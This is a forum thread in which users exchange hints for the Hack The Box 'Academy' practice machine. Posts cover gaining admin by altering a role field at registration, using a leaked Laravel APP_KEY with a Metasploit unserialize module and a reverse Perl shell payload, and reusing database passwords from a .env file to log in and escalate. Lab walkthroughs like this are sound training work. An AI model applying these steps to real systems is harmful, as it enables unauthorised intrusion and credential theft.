TUTORIAL Academy Discussion
by Ro0ted - November 07, 2020 at 09:49 PM
#1
If anyone have any hints for the box, feel free to post here :)
#2
Registered a user with the admin role by changing role from 0 to 1 in request - from there logged into /admin.php panel and saw tasks completed. Added dev/staging subdomain to hosts and saw laravel debug info - db creds leaked but haven't been able to do anything with them.
port 33060 open but haven't had any luck with mysql cli. :/

any help?
#3
Anything guys please help confused a little after getting creds tried smtp but hey please help
#4
use metasploit module with app_key
#5
(November 07, 2020 at 11:20 PM)Ro0ted Wrote: use metasploit module with app_key

set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

`
msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit
[*] Exploit completed, but no session was created.
`

Any thoughts?
#6
Hmmmm have u set everything well
#7
(November 07, 2020 at 11:29 PM)guest55 Wrote: Hmmmm have u set everything well

Does this look correct?
msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

  Name      Current Setting                              Required  Description
  ----      ---------------                              --------  -----------
  APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file
  Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS    10.10.10.215                                  yes      The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                                            yes      The target port (TCP)
  SSL        false                                        no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                                            yes      Path to target webapp
  VHOST      academy.htb                                  no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

  Name  Current Setting  Required  Description
  ----  ---------------  --------  -----------
  LHOST  10.10.xx.xxx    yes      The listen address (an interface may be specified)
  LPORT  4444            yes      The listen port
#8
the vhost is wrong, you have to put the vhost you found in admin panel
#9
bingo:
set vhost dev-staging-01.academy.htb

got a foothold. now what lol

looks like a bunch of users. hmmmm.

Hmmm cracked some bcrypt hashes found from linpeas but it appears its just the homestead db password: "secret"
I cant connect to forge or homestead dbs as www-data. I keep getting "Access denied for user 'XXXXX'@'localhost"

Tried to get stuff from redis but redis-cli isnt installed. Where is everyone else looking? I feel as though it's right in front of my face and I'm just missing it.

Wondering if anyone was able to connect with the info in: /var/www/html/academy/.env???
...
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
...


Trying to connect:
[email protected]:/var/www/html/academy$ mysql -u dev -h 127.0.0.1 -D academy -p
mysql -u dev -h 127.0.0.1 -D academy -p
Enter password: mySup3rP4s5w0rd!!

ERROR 1045 (28000): Access denied for user 'dev'@'localhost' (using password: YES)
#10
password for cry0l1t3 user is in here, just su or you can ssh in
/var/www/html/academy/.env
#11
(November 08, 2020 at 12:32 AM)ragnarokhype Wrote: password for cry0l1t3 user is in here, just su or you can ssh in
/var/www/html/academy/.env

Ahhhh Thank you! I didn't think of using the db password for user login. Now on to the privesc...
#12
just rooted - what a ride

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Fortress - Faraday (Discussion) slrrrR 13 1,596 1 hour ago
Last Post: orangutang
TUTORIAL HTB Overflow (Discussion) infosecsy18 11 968 2 hours ago
Last Post: slrrrR
TUTORIAL HTB Devzat [Discussion] pheonix2021 54 9,006 Yesterday at 05:03 PM
Last Post: davin7i

 Users browsing this thread: 1 Guest(s)